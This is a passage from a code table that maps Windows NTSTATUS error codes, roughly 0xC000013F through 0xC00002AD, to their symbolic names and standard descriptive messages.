Closed} An existing connection (virtual circuit) has been broken at the remote computer. There is probably something wrong with the network software protocol or the network hardware on the remote computer."), 0xC000013F: ("STATUS_LINK_TIMEOUT","{Virtual Circuit Closed} The network transport on your computer has closed a network connection because it had to wait too long for a response from the remote computer."), 0xC0000140: ("STATUS_INVALID_CONNECTION","The connection handle that was given to the transport was invalid."), 0xC0000141: ("STATUS_INVALID_ADDRESS","The address handle that was given to the transport was invalid."), 0xC0000142: ("STATUS_DLL_INIT_FAILED","{DLL Initialization Failed} Initialization of the dynamic link library %hs failed. The process is terminating abnormally."), 0xC0000143: ("STATUS_MISSING_SYSTEMFILE","{Missing System File} The required system file %hs is bad or missing."), 0xC0000144: ("STATUS_UNHANDLED_EXCEPTION","{Application Error} The exception %s (0x%08lx) occurred in the application at location 0x%08lx."), 0xC0000145: ("STATUS_APP_INIT_FAILURE","{Application Error} The application failed to initialize properly (0x%lx). Click OK to terminate the application."), 0xC0000146: ("STATUS_PAGEFILE_CREATE_FAILED","{Unable to Create Paging File} The creation of the paging file %hs failed (%lx). The requested size was %ld."), 0xC0000147: ("STATUS_NO_PAGEFILE","{No Paging File Specified} No paging file was specified in the system configuration."), 0xC0000148: ("STATUS_INVALID_LEVEL","{Incorrect System Call Level} An invalid level was passed into the specified system call."), 0xC0000149: ("STATUS_WRONG_PASSWORD_CORE","{Incorrect Password to LAN Manager Server} You specified an incorrect password to a LAN Manager 2.x or MS-NET server."), 0xC000014A: ("STATUS_ILLEGAL_FLOAT_CONTEXT","{EXCEPTION} A real-mode application issued a floating-point instruction and floating-point hardware is not present."), 0xC000014B: ("STATUS_PIPE_BROKEN","The pipe operation has failed because the other end of the pipe has been closed."), 0xC000014C: ("STATUS_REGISTRY_CORRUPT","{The Registry Is Corrupt} The structure of one of the files that contains registry data is corrupt; the image of the file in memory is corrupt; or the file could not be recovered because the alternate copy or log was absent or corrupt."), 0xC000014D: ("STATUS_REGISTRY_IO_FAILED","An I/O operation initiated by the Registry failed and cannot be recovered. The registry could not read in, write out, or flush one of the files that contain the system's image of the registry."), 0xC000014E: ("STATUS_NO_EVENT_PAIR","An event pair synchronization operation was performed using the thread-specific client/server event pair object, but no event pair object was associated with the thread."), 0xC000014F: ("STATUS_UNRECOGNIZED_VOLUME","The volume does not contain a recognized file system. Be sure that all required file system drivers are loaded and that the volume is not corrupt."), 0xC0000150: ("STATUS_SERIAL_NO_DEVICE_INITED","No serial device was successfully initialized. The serial driver will unload."), 0xC0000151: ("STATUS_NO_SUCH_ALIAS","The specified local group does not exist."), 0xC0000152: ("STATUS_MEMBER_NOT_IN_ALIAS","The specified account name is not a member of the group."), 0xC0000153: ("STATUS_MEMBER_IN_ALIAS","The specified account name is already a member of the group."), 0xC0000154: ("STATUS_ALIAS_EXISTS","The specified local group already exists."), 0xC0000155: ("STATUS_LOGON_NOT_GRANTED","A requested type of logon (for example, interactive, network, and service) is not granted by the local security policy of the target system. Ask the system administrator to grant the necessary form of logon."), 0xC0000156: ("STATUS_TOO_MANY_SECRETS","The maximum number of secrets that may be stored in a single system was exceeded. The length and number of secrets is limited to satisfy U.S. State Department export restrictions."), 0xC0000157: ("STATUS_SECRET_TOO_LONG","The length of a secret exceeds the maximum allowable length. The length and number of secrets is limited to satisfy U.S. State Department export restrictions."), 0xC0000158: ("STATUS_INTERNAL_DB_ERROR","The local security authority (LSA) database contains an internal inconsistency."), 0xC0000159: ("STATUS_FULLSCREEN_MODE","The requested operation cannot be performed in full-screen mode."), 0xC000015A: ("STATUS_TOO_MANY_CONTEXT_IDS","During a logon attempt, the user's security context accumulated too many security IDs. This is a very unusual situation. Remove the user from some global or local groups to reduce the number of security IDs to incorporate into the security context."), 0xC000015B: ("STATUS_LOGON_TYPE_NOT_GRANTED","A user has requested a type of logon (for example, interactive or network) that has not been granted. An administrator has control over who may logon interactively and through the network."), 0xC000015C: ("STATUS_NOT_REGISTRY_FILE","The system has attempted to load or restore a file into the registry, and the specified file is not in the format of a registry file."), 0xC000015D: ("STATUS_NT_CROSS_ENCRYPTION_REQUIRED","An attempt was made to change a user password in the security account manager without providing the necessary Windows cross-encrypted password."), 0xC000015E: ("STATUS_DOMAIN_CTRLR_CONFIG_ERROR","A Windows Server has an incorrect configuration."), 0xC000015F: ("STATUS_FT_MISSING_MEMBER","An attempt was made to explicitly access the secondary copy of information via a device control to the fault tolerance driver and the secondary copy is not present in the system."), 0xC0000160: ("STATUS_ILL_FORMED_SERVICE_ENTRY","A configuration registry node that represents a driver service entry was ill-formed and did not contain the required value entries."), 0xC0000161: ("STATUS_ILLEGAL_CHARACTER","An illegal character was encountered. For a multibyte character set, this includes a lead byte without a succeeding trail byte. For the Unicode character set this includes the characters 0xFFFF and 0xFFFE."), 0xC0000162: ("STATUS_UNMAPPABLE_CHARACTER","No mapping for the Unicode character exists in the target multibyte code page."), 0xC0000163: ("STATUS_UNDEFINED_CHARACTER","The Unicode character is not defined in the Unicode character set that is installed on the system."), 0xC0000164: ("STATUS_FLOPPY_VOLUME","The paging file cannot be created on a floppy disk."), 0xC0000165: ("STATUS_FLOPPY_ID_MARK_NOT_FOUND","{Floppy Disk Error} While accessing a floppy disk, an ID address mark was not found."), 0xC0000166: ("STATUS_FLOPPY_WRONG_CYLINDER","{Floppy Disk Error} While accessing a floppy disk, the track address from the sector ID field was found to be different from the track address that is maintained by the controller."), 0xC0000167: ("STATUS_FLOPPY_UNKNOWN_ERROR","{Floppy Disk Error} The floppy disk controller reported an error that is not recognized by the floppy disk driver."), 0xC0000168: ("STATUS_FLOPPY_BAD_REGISTERS","{Floppy Disk Error} While accessing a floppy-disk, the controller returned inconsistent results via its registers."), 0xC0000169: ("STATUS_DISK_RECALIBRATE_FAILED","{Hard Disk Error} While accessing the hard disk, a recalibrate operation failed, even after retries."), 0xC000016A: ("STATUS_DISK_OPERATION_FAILED","{Hard Disk Error} While accessing the hard disk, a disk operation failed even after retries."), 0xC000016B: ("STATUS_DISK_RESET_FAILED","{Hard Disk Error} While accessing the hard disk, a disk controller reset was needed, but even that failed."), 0xC000016C: ("STATUS_SHARED_IRQ_BUSY","An attempt was made to open a device that was sharing an interrupt request (IRQ) with other devices. At least one other device that uses that IRQ was already opened. Two concurrent opens of devices that share an IRQ and only work via interrupts is not supported for the particular bus type that the devices use."), 0xC000016D: ("STATUS_FT_ORPHANING","{FT Orphaning} A disk that is part of a fault-tolerant volume can no longer be accessed."), 0xC000016E: ("STATUS_BIOS_FAILED_TO_CONNECT_INTERRUPT","The basic input/output system (BIOS) failed to connect a system interrupt to the device or bus for which the device is connected."), 0xC0000172: ("STATUS_PARTITION_FAILURE","The tape could not be partitioned."), 0xC0000173: ("STATUS_INVALID_BLOCK_LENGTH","When accessing a new tape of a multi-volume partition, the current blocksize is incorrect."), 0xC0000174: ("STATUS_DEVICE_NOT_PARTITIONED","The tape partition information could not be found when loading a tape."), 0xC0000175: ("STATUS_UNABLE_TO_LOCK_MEDIA","An attempt to lock the eject media mechanism failed."), 0xC0000176: ("STATUS_UNABLE_TO_UNLOAD_MEDIA","An attempt to unload media failed."), 0xC0000177: ("STATUS_EOM_OVERFLOW","The physical end of tape was detected."), 0xC0000178: ("STATUS_NO_MEDIA","{No Media} There is no media in the drive. Insert media into drive %hs."), 0xC000017A: ("STATUS_NO_SUCH_MEMBER","A member could not be added to or removed from the local group because the member does not exist."), 0xC000017B: ("STATUS_INVALID_MEMBER","A new member could not be added to a local group because the member has the wrong account type."), 0xC000017C: ("STATUS_KEY_DELETED","An illegal operation was attempted on a registry key that has been marked for deletion."), 0xC000017D: ("STATUS_NO_LOG_SPACE","The system could not allocate the required space in a registry log."), 0xC000017E: ("STATUS_TOO_MANY_SIDS","Too many SIDs have been specified."), 0xC000017F: ("STATUS_LM_CROSS_ENCRYPTION_REQUIRED","An attempt was made to change a user password in the security account manager without providing the necessary LM cross-encrypted password."), 0xC0000180: ("STATUS_KEY_HAS_CHILDREN","An attempt was made to create a symbolic link in a registry key that already has subkeys or values."), 0xC0000181: ("STATUS_CHILD_MUST_BE_VOLATILE","An attempt was made to create a stable subkey under a volatile parent key."), 0xC0000182: ("STATUS_DEVICE_CONFIGURATION_ERROR","The I/O device is configured incorrectly or the configuration parameters to the driver are incorrect."), 0xC0000183: ("STATUS_DRIVER_INTERNAL_ERROR","An error was detected between two drivers or within an I/O driver."), 0xC0000184: ("STATUS_INVALID_DEVICE_STATE","The device is not in a valid state to perform this request."), 0xC0000185: ("STATUS_IO_DEVICE_ERROR","The I/O device reported an I/O error."), 0xC0000186: ("STATUS_DEVICE_PROTOCOL_ERROR","A protocol error was detected between the driver and the device."), 0xC0000187: ("STATUS_BACKUP_CONTROLLER","This operation is only allowed for the primary domain controller of the domain."), 0xC0000188: ("STATUS_LOG_FILE_FULL","The log file space is insufficient to support this operation."), 0xC0000189: ("STATUS_TOO_LATE","A write operation was attempted to a volume after it was dismounted."), 0xC000018A: ("STATUS_NO_TRUST_LSA_SECRET","The workstation does not have a trust secret for the primary domain in the local LSA database."), 0xC000018B: ("STATUS_NO_TRUST_SAM_ACCOUNT","The SAM database on the Windows Server does not have a computer account for this workstation trust relationship."), 0xC000018C: ("STATUS_TRUSTED_DOMAIN_FAILURE","The logon request failed because the trust relationship between the primary domain and the trusted domain failed."), 0xC000018D: ("STATUS_TRUSTED_RELATIONSHIP_FAILURE","The logon request failed because the trust relationship between this workstation and the primary domain failed."), 0xC000018E: ("STATUS_EVENTLOG_FILE_CORRUPT","The Eventlog log file is corrupt."), 0xC000018F: ("STATUS_EVENTLOG_CANT_START","No Eventlog log file could be opened. The Eventlog service did not start."), 0xC0000190: ("STATUS_TRUST_FAILURE","The network logon failed. This may be because the validation authority cannot be reached."), 0xC0000191: ("STATUS_MUTANT_LIMIT_EXCEEDED","An attempt was made to acquire a mutant such that its maximum count would have been exceeded."), 0xC0000192: ("STATUS_NETLOGON_NOT_STARTED","An attempt was made to logon, but the NetLogon service was not started."), 0xC0000193: ("STATUS_ACCOUNT_EXPIRED","The user account has expired."), 0xC0000194: ("STATUS_POSSIBLE_DEADLOCK","{EXCEPTION} Possible deadlock condition."), 0xC0000195: ("STATUS_NETWORK_CREDENTIAL_CONFLICT","Multiple connections to a server or shared resource by the same user, using more than one user name, are not allowed. Disconnect all previous connections to the server or shared resource and try again."), 0xC0000196: ("STATUS_REMOTE_SESSION_LIMIT","An attempt was made to establish a session to a network server, but there are already too many sessions established to that server."), 0xC0000197: ("STATUS_EVENTLOG_FILE_CHANGED","The log file has changed between reads."), 0xC0000198: ("STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT","The account used is an interdomain trust account. Use your global user account or local user account to access this server."), 0xC0000199: ("STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT","The account used is a computer account. Use your global user account or local user account to access this server."), 0xC000019A: ("STATUS_NOLOGON_SERVER_TRUST_ACCOUNT","The account used is a server trust account. Use your global user account or local user account to access this server."), 0xC000019B: ("STATUS_DOMAIN_TRUST_INCONSISTENT","The name or SID of the specified domain is inconsistent with the trust information for that domain."), 0xC000019C: ("STATUS_FS_DRIVER_REQUIRED","A volume has been accessed for which a file system driver is required that has not yet been loaded."), 0xC000019D: ("STATUS_IMAGE_ALREADY_LOADED_AS_DLL","Indicates that the specified image is already loaded as a DLL."), 0xC000019E: ("STATUS_INCOMPATIBLE_WITH_GLOBAL_SHORT_NAME_REGISTRY_SETTING","Short name settings may not be changed on this volume due to the global registry setting."), 0xC000019F: ("STATUS_SHORT_NAMES_NOT_ENABLED_ON_VOLUME","Short names are not enabled on this volume."), 0xC00001A0: ("STATUS_SECURITY_STREAM_IS_INCONSISTENT","The security stream for the given volume is in an inconsistent state. Please run CHKDSK on the volume."), 0xC00001A1: ("STATUS_INVALID_LOCK_RANGE","A requested file lock operation cannot be processed due to an invalid byte range."), 0xC00001A2: ("STATUS_INVALID_ACE_CONDITION","The specified access control entry (ACE) contains an invalid condition."), 0xC00001A3: ("STATUS_IMAGE_SUBSYSTEM_NOT_PRESENT","The subsystem needed to support the image type is not present."), 0xC00001A4: ("STATUS_NOTIFICATION_GUID_ALREADY_DEFINED","The specified file already has a notification GUID associated with it."), 0xC0000201: ("STATUS_NETWORK_OPEN_RESTRICTION","A remote open failed because the network open restrictions were not satisfied."), 0xC0000202: ("STATUS_NO_USER_SESSION_KEY","There is no user session key for the specified logon session."), 0xC0000203: ("STATUS_USER_SESSION_DELETED","The remote user session has been deleted."), 0xC0000204: ("STATUS_RESOURCE_LANG_NOT_FOUND","Indicates the specified resource language ID cannot be found in the image file."), 0xC0000205: ("STATUS_INSUFF_SERVER_RESOURCES","Insufficient server resources exist to complete the request."), 0xC0000206: ("STATUS_INVALID_BUFFER_SIZE","The size of the buffer is invalid for the specified operation."), 0xC0000207: ("STATUS_INVALID_ADDRESS_COMPONENT","The transport rejected the specified network address as invalid."), 0xC0000208: ("STATUS_INVALID_ADDRESS_WILDCARD","The transport rejected the specified network address due to invalid use of a wildcard."), 0xC0000209: ("STATUS_TOO_MANY_ADDRESSES","The transport address could not be opened because all the available addresses are in use."), 0xC000020A: ("STATUS_ADDRESS_ALREADY_EXISTS","The transport address could not be opened because it already exists."), 0xC000020B: ("STATUS_ADDRESS_CLOSED","The transport address is now closed."), 0xC000020C: ("STATUS_CONNECTION_DISCONNECTED","The transport connection is now disconnected."), 0xC000020D: ("STATUS_CONNECTION_RESET","The transport connection has been reset."), 0xC000020E: ("STATUS_TOO_MANY_NODES","The transport cannot dynamically acquire any more nodes."), 0xC000020F: ("STATUS_TRANSACTION_ABORTED","The transport aborted a pending transaction."), 0xC0000210: ("STATUS_TRANSACTION_TIMED_OUT","The transport timed out a request that is waiting for a response."), 0xC0000211: ("STATUS_TRANSACTION_NO_RELEASE","The transport did not receive a release for a pending response."), 0xC0000212: ("STATUS_TRANSACTION_NO_MATCH","The transport did not find a transaction that matches the specific token."), 0xC0000213: ("STATUS_TRANSACTION_RESPONDED","The transport had previously responded to a transaction request."), 0xC0000214: ("STATUS_TRANSACTION_INVALID_ID","The transport does not recognize the specified transaction request ID."), 0xC0000215: ("STATUS_TRANSACTION_INVALID_TYPE","The transport does not recognize the specified transaction request type."), 0xC0000216: ("STATUS_NOT_SERVER_SESSION","The transport can only process the specified request on the server side of a session."), 0xC0000217: ("STATUS_NOT_CLIENT_SESSION","The transport can only process the specified request on the client side of a session."), 0xC0000218: ("STATUS_CANNOT_LOAD_REGISTRY_FILE","{Registry File Failure} The registry cannot load the hive (file): %hs or its log or alternate. It is corrupt, absent, or not writable."), 0xC0000219: ("STATUS_DEBUG_ATTACH_FAILED","{Unexpected Failure in DebugActiveProcess} An unexpected failure occurred while processing a DebugActiveProcess API request. You may choose OK to terminate the process, or Cancel to ignore the error."), 0xC000021A: ("STATUS_SYSTEM_PROCESS_TERMINATED","{Fatal System Error} The %hs system process terminated unexpectedly with a status of 0x%08x (0x%08x 0x%08x). The system has been shut down."), 0xC000021B: ("STATUS_DATA_NOT_ACCEPTED","{Data Not Accepted} The TDI client could not handle the data received during an indication."), 0xC000021C: ("STATUS_NO_BROWSER_SERVERS_FOUND","{Unable to Retrieve Browser Server List} The list of servers for this workgroup is not currently available."), 0xC000021D: ("STATUS_VDM_HARD_ERROR","NTVDM encountered a hard error."), 0xC000021E: ("STATUS_DRIVER_CANCEL_TIMEOUT","{Cancel Timeout} The driver %hs failed to complete a canceled I/O request in the allotted time."), 0xC000021F: ("STATUS_REPLY_MESSAGE_MISMATCH","{Reply Message Mismatch} An attempt was made to reply to an LPC message, but the thread specified by the client ID in the message was not waiting on that message."), 0xC0000220: ("STATUS_MAPPED_ALIGNMENT","{Mapped View Alignment Incorrect} An attempt was made to map a view of a file, but either the specified base address or the offset into the file were not aligned on the proper allocation granularity."), 0xC0000221: ("STATUS_IMAGE_CHECKSUM_MISMATCH","{Bad Image Checksum} The image %hs is possibly corrupt. The header checksum does not match the computed checksum."), 0xC0000222: ("STATUS_LOST_WRITEBEHIND_DATA","{Delayed Write Failed} Windows was unable to save all the data for the file %hs. The data has been lost. This error may be caused by a failure of your computer hardware or network connection. Try to save this file elsewhere."), 0xC0000223: ("STATUS_CLIENT_SERVER_PARAMETERS_INVALID","The parameters passed to the server in the client/server shared memory window were invalid. Too much data may have been put in the shared memory window."), 0xC0000224: ("STATUS_PASSWORD_MUST_CHANGE","The user password must be changed before logging on the first time."), 0xC0000225: ("STATUS_NOT_FOUND","The object was not found."), 0xC0000226: ("STATUS_NOT_TINY_STREAM","The stream is not a tiny stream."), 0xC0000227: ("STATUS_RECOVERY_FAILURE","A transaction recovery failed."), 0xC0000228: ("STATUS_STACK_OVERFLOW_READ","The request must be handled by the stack overflow code."), 0xC0000229: ("STATUS_FAIL_CHECK","A consistency check failed."), 0xC000022A: ("STATUS_DUPLICATE_OBJECTID","The attempt to insert the ID in the index failed because the ID is already in the index."), 0xC000022B: ("STATUS_OBJECTID_EXISTS","The attempt to set the object ID failed because the object already has an ID."), 0xC000022C: ("STATUS_CONVERT_TO_LARGE","Internal OFS status codes indicating how an allocation operation is handled. Either it is retried after the containing oNode is moved or the extent stream is converted to a large stream."), 0xC000022D: ("STATUS_RETRY","The request needs to be retried."), 0xC000022E: ("STATUS_FOUND_OUT_OF_SCOPE","The attempt to find the object found an object on the volume that matches by ID; however, it is out of the scope of the handle that is used for the operation."), 0xC000022F: ("STATUS_ALLOCATE_BUCKET","The bucket array must be grown. Retry the transaction after doing so."), 0xC0000230: ("STATUS_PROPSET_NOT_FOUND","The specified property set does not exist on the object."), 0xC0000231: ("STATUS_MARSHALL_OVERFLOW","The user/kernel marshaling buffer has overflowed."), 0xC0000232: ("STATUS_INVALID_VARIANT","The supplied variant structure contains invalid data."), 0xC0000233: ("STATUS_DOMAIN_CONTROLLER_NOT_FOUND","A domain controller for this domain was not found."), 0xC0000234: ("STATUS_ACCOUNT_LOCKED_OUT","The user account has been automatically locked because too many invalid logon attempts or password change attempts have been requested."), 0xC0000235: ("STATUS_HANDLE_NOT_CLOSABLE","NtClose was called on a handle that was protected from close via NtSetInformationObject."), 0xC0000236: ("STATUS_CONNECTION_REFUSED","The transport-connection attempt was refused by the remote system."), 0xC0000237: ("STATUS_GRACEFUL_DISCONNECT","The transport connection was gracefully closed."), 0xC0000238: ("STATUS_ADDRESS_ALREADY_ASSOCIATED","The transport endpoint already has an address associated with it."), 0xC0000239: ("STATUS_ADDRESS_NOT_ASSOCIATED","An address has not yet been associated with the transport endpoint."), 0xC000023A: ("STATUS_CONNECTION_INVALID","An operation was attempted on a nonexistent transport connection."), 0xC000023B: ("STATUS_CONNECTION_ACTIVE","An invalid operation was attempted on an active transport connection."), 0xC000023C: ("STATUS_NETWORK_UNREACHABLE","The remote network is not reachable by the transport."), 0xC000023D: ("STATUS_HOST_UNREACHABLE","The remote system is not reachable by the transport."), 0xC000023E: ("STATUS_PROTOCOL_UNREACHABLE","The remote system does not support the transport protocol."), 0xC000023F: ("STATUS_PORT_UNREACHABLE","No service is operating at the destination port of the transport on the remote system."), 0xC0000240: ("STATUS_REQUEST_ABORTED","The request was aborted."), 0xC0000241: ("STATUS_CONNECTION_ABORTED","The transport connection was aborted by the local system."), 0xC0000242: ("STATUS_BAD_COMPRESSION_BUFFER","The specified buffer contains ill-formed data."), 0xC0000243: ("STATUS_USER_MAPPED_FILE","The requested operation cannot be performed on a file with a user mapped section open."), 0xC0000244: ("STATUS_AUDIT_FAILED","{Audit Failed} An attempt to generate a security audit failed."), 0xC0000245: ("STATUS_TIMER_RESOLUTION_NOT_SET","The timer resolution was not previously set by the current process."), 0xC0000246: ("STATUS_CONNECTION_COUNT_LIMIT","A connection to the server could not be made because the limit on the number of concurrent connections for this account has been reached."), 0xC0000247: ("STATUS_LOGIN_TIME_RESTRICTION","Attempting to log on during an unauthorized time of day for this account."), 0xC0000248: ("STATUS_LOGIN_WKSTA_RESTRICTION","The account is not authorized to log on from this station."), 0xC0000249: ("STATUS_IMAGE_MP_UP_MISMATCH","{UP/MP Image Mismatch} The image %hs has been modified for use on a uniprocessor system, but you are running it on a multiprocessor machine. Reinstall the image file."), 0xC0000250: ("STATUS_INSUFFICIENT_LOGON_INFO","There is insufficient account information to log you on."), 0xC0000251: ("STATUS_BAD_DLL_ENTRYPOINT","{Invalid DLL Entrypoint} The dynamic link library %hs is not written correctly. The stack pointer has been left in an inconsistent state. The entry point should be declared as WINAPI or STDCALL. Select YES to fail the DLL load. Select NO to continue execution. Selecting NO may cause the application to operate incorrectly."), 0xC0000252: ("STATUS_BAD_SERVICE_ENTRYPOINT","{Invalid Service Callback Entrypoint} The %hs service is not written correctly. The stack pointer has been left in an inconsistent state. The callback entry point should be declared as WINAPI or STDCALL. Selecting OK will cause the service to continue operation. However, the service process may operate incorrectly."), 0xC0000253: ("STATUS_LPC_REPLY_LOST","The server received the messages but did not send a reply."), 0xC0000254: ("STATUS_IP_ADDRESS_CONFLICT1","There is an IP address conflict with another system on the network."), 0xC0000255: ("STATUS_IP_ADDRESS_CONFLICT2","There is an IP address conflict with another system on the network."), 0xC0000256: ("STATUS_REGISTRY_QUOTA_LIMIT","{Low On Registry Space} The system has reached the maximum size that is allowed for the system part of the registry. Additional storage requests will be ignored."), 0xC0000257: ("STATUS_PATH_NOT_COVERED","The contacted server does not support the indicated part of the DFS namespace."), 0xC0000258: ("STATUS_NO_CALLBACK_ACTIVE","A callback return system service cannot be executed when no callback is active."), 0xC0000259: ("STATUS_LICENSE_QUOTA_EXCEEDED","The service being accessed is licensed for a particular number of connections. No more connections can be made to the service at this time because the service has already accepted the maximum number of connections."), 0xC000025A: ("STATUS_PWD_TOO_SHORT","The password provided is too short to meet the policy of your user account. Choose a longer password."), 0xC000025B: ("STATUS_PWD_TOO_RECENT","The policy of your user account does not allow you to change passwords too frequently. This is done to prevent users from changing back to a familiar, but potentially discovered, password. If you feel your password has been compromised, contact your administrator immediately to have a new one assigned."), 0xC000025C: ("STATUS_PWD_HISTORY_CONFLICT","You have attempted to change your password to one that you have used in the past. The policy of your user account does not allow this. Select a password that you have not previously used."), 0xC000025E: ("STATUS_PLUGPLAY_NO_DEVICE","You have attempted to load a legacy device driver while its device instance had been disabled."), 0xC000025F: ("STATUS_UNSUPPORTED_COMPRESSION","The specified compression format is unsupported."), 0xC0000260: ("STATUS_INVALID_HW_PROFILE","The specified hardware profile configuration is invalid."), 0xC0000261: ("STATUS_INVALID_PLUGPLAY_DEVICE_PATH","The specified Plug and Play registry device path is invalid."), 0xC0000262: ("STATUS_DRIVER_ORDINAL_NOT_FOUND","{Driver Entry Point Not Found} The %hs device driver could not locate the ordinal %ld in driver %hs."), 0xC0000263: ("STATUS_DRIVER_ENTRYPOINT_NOT_FOUND","{Driver Entry Point Not Found} The %hs device driver could not locate the entry point %hs in driver %hs."), 0xC0000264: ("STATUS_RESOURCE_NOT_OWNED","{Application Error} The application attempted to release a resource it did not own. Click OK to terminate the application."), 0xC0000265: ("STATUS_TOO_MANY_LINKS","An attempt was made to create more links on a file than the file system supports."), 0xC0000266: ("STATUS_QUOTA_LIST_INCONSISTENT","The specified quota list is internally inconsistent with its descriptor."), 0xC0000267: ("STATUS_FILE_IS_OFFLINE","The specified file has been relocated to offline storage."), 0xC0000268: ("STATUS_EVALUATION_EXPIRATION","{Windows Evaluation Notification} The evaluation period for this installation of Windows has expired. This system will shutdown in 1 hour. To restore access to this installation of Windows, upgrade this installation by using a licensed distribution of this product."), 0xC0000269: ("STATUS_ILLEGAL_DLL_RELOCATION","{Illegal System DLL Relocation} The system DLL %hs was relocated in memory. The application will not run properly. The relocation occurred because the DLL %hs occupied an address range that is reserved for Windows system DLLs. The vendor supplying the DLL should be contacted for a new DLL."), 0xC000026A: ("STATUS_LICENSE_VIOLATION","{License Violation} The system has detected tampering with your registered product type. This is a violation of your software license. Tampering with the product type is not permitted."), 0xC000026B: ("STATUS_DLL_INIT_FAILED_LOGOFF","{DLL Initialization Failed} The application failed to initialize because the window station is shutting down."), 0xC000026C: ("STATUS_DRIVER_UNABLE_TO_LOAD","{Unable to Load Device Driver} %hs device driver could not be loaded. Error Status was 0x%x."), 0xC000026D: ("STATUS_DFS_UNAVAILABLE","DFS is unavailable on the contacted server."), 0xC000026E: ("STATUS_VOLUME_DISMOUNTED","An operation was attempted to a volume after it was dismounted."), 0xC000026F: ("STATUS_WX86_INTERNAL_ERROR","An internal error occurred in the Win32 x86 emulation subsystem."), 0xC0000270: ("STATUS_WX86_FLOAT_STACK_CHECK","Win32 x86 emulation subsystem floating-point stack check."), 0xC0000271: ("STATUS_VALIDATE_CONTINUE","The validation process needs to continue on to the next step."), 0xC0000272: ("STATUS_NO_MATCH","There was no match for the specified key in the index."), 0xC0000273: ("STATUS_NO_MORE_MATCHES","There are no more matches for the current index enumeration."), 0xC0000275: ("STATUS_NOT_A_REPARSE_POINT","The NTFS file or directory is not a reparse point."), 0xC0000276: ("STATUS_IO_REPARSE_TAG_INVALID","The Windows I/O reparse tag passed for the NTFS reparse point is invalid."), 0xC0000277: ("STATUS_IO_REPARSE_TAG_MISMATCH","The Windows I/O reparse tag does not match the one that is in the NTFS reparse point."), 0xC0000278: ("STATUS_IO_REPARSE_DATA_INVALID","The user data passed for the NTFS reparse point is invalid."), 0xC0000279: ("STATUS_IO_REPARSE_TAG_NOT_HANDLED","The layered file system driver for this I/O tag did not handle it when needed."), 0xC0000280: ("STATUS_REPARSE_POINT_NOT_RESOLVED","The NTFS symbolic link could not be resolved even though the initial file name is valid."), 0xC0000281: ("STATUS_DIRECTORY_IS_A_REPARSE_POINT","The NTFS directory is a reparse point."), 0xC0000282: ("STATUS_RANGE_LIST_CONFLICT","The range could not be added to the range list because of a conflict."), 0xC0000283: ("STATUS_SOURCE_ELEMENT_EMPTY","The specified medium changer source element contains no media."), 0xC0000284: ("STATUS_DESTINATION_ELEMENT_FULL","The specified medium changer destination element already contains media."), 0xC0000285: ("STATUS_ILLEGAL_ELEMENT_ADDRESS","The specified medium changer element does not exist."), 0xC0000286: ("STATUS_MAGAZINE_NOT_PRESENT","The specified element is contained in a magazine that is no longer present."), 0xC0000287: ("STATUS_REINITIALIZATION_NEEDED","The device requires re-initialization due to hardware errors."), 0xC000028A: ("STATUS_ENCRYPTION_FAILED","The file encryption attempt failed."), 0xC000028B: ("STATUS_DECRYPTION_FAILED","The file decryption attempt failed."), 0xC000028C: ("STATUS_RANGE_NOT_FOUND","The specified range could not be found in the range list."), 0xC000028D: ("STATUS_NO_RECOVERY_POLICY","There is no encryption recovery policy configured for this system."), 0xC000028E: ("STATUS_NO_EFS","The required encryption driver is not loaded for this system."), 0xC000028F: ("STATUS_WRONG_EFS","The file was encrypted with a different encryption driver than is currently loaded."), 0xC0000290: ("STATUS_NO_USER_KEYS","There are no EFS keys defined for the user."), 0xC0000291: ("STATUS_FILE_NOT_ENCRYPTED","The specified file is not encrypted."), 0xC0000292: ("STATUS_NOT_EXPORT_FORMAT","The specified file is not in the defined EFS export format."), 0xC0000293: ("STATUS_FILE_ENCRYPTED","The specified file is encrypted and the user does not have the ability to decrypt it."), 0xC0000295: ("STATUS_WMI_GUID_NOT_FOUND","The GUID passed was not recognized as valid by a WMI data provider."), 0xC0000296: ("STATUS_WMI_INSTANCE_NOT_FOUND","The instance name passed was not recognized as valid by a WMI data provider."), 0xC0000297: ("STATUS_WMI_ITEMID_NOT_FOUND","The data item ID passed was not recognized as valid by a WMI data provider."), 0xC0000298: ("STATUS_WMI_TRY_AGAIN","The WMI request could not be completed and should be retried."), 0xC0000299: ("STATUS_SHARED_POLICY","The policy object is shared and can only be modified at the root."), 0xC000029A: ("STATUS_POLICY_OBJECT_NOT_FOUND","The policy object does not exist when it should."), 0xC000029B: ("STATUS_POLICY_ONLY_IN_DS","The requested policy information only lives in the Ds."), 0xC000029C: ("STATUS_VOLUME_NOT_UPGRADED","The volume must be upgraded to enable this feature."), 0xC000029D: ("STATUS_REMOTE_STORAGE_NOT_ACTIVE","The remote storage service is not operational at this time."), 0xC000029E: ("STATUS_REMOTE_STORAGE_MEDIA_ERROR","The remote storage service encountered a media error."), 0xC000029F: ("STATUS_NO_TRACKING_SERVICE","The tracking (workstation) service is not running."), 0xC00002A0: ("STATUS_SERVER_SID_MISMATCH","The server process is running under a SID that is different from the SID that is required by client."), 0xC00002A1: ("STATUS_DS_NO_ATTRIBUTE_OR_VALUE","The specified directory service attribute or value does not exist."), 0xC00002A2: ("STATUS_DS_INVALID_ATTRIBUTE_SYNTAX","The attribute syntax specified to the directory service is invalid."), 0xC00002A3: ("STATUS_DS_ATTRIBUTE_TYPE_UNDEFINED","The attribute type specified to the directory service is not defined."), 0xC00002A4: ("STATUS_DS_ATTRIBUTE_OR_VALUE_EXISTS","The specified directory service attribute or value already exists."), 0xC00002A5: ("STATUS_DS_BUSY","The directory service is busy."), 0xC00002A6: ("STATUS_DS_UNAVAILABLE","The directory service is unavailable."), 0xC00002A7: ("STATUS_DS_NO_RIDS_ALLOCATED","The directory service was unable to allocate a relative identifier."), 0xC00002A8: ("STATUS_DS_NO_MORE_RIDS","The directory service has exhausted the pool of relative identifiers."), 0xC00002A9: ("STATUS_DS_INCORRECT_ROLE_OWNER","The requested operation could not be performed because the directory service is not the master for that type of operation."), 0xC00002AA: ("STATUS_DS_RIDMGR_INIT_ERROR","The directory service was unable to initialize the subsystem that allocates relative identifiers."), 0xC00002AB: ("STATUS_DS_OBJ_CLASS_VIOLATION","The requested operation did not satisfy one or more constraints that are associated with the class of the object."), 0xC00002AC: ("STATUS_DS_CANT_ON_NON_LEAF","The directory service can perform the requested operation only on a leaf object."), 0xC00002AD: ("STATUS_DS_CANT_ON_RDN","The directory service cannot perform the requested operation on the Relatively Defined Name (RDN) attribute of an object."), 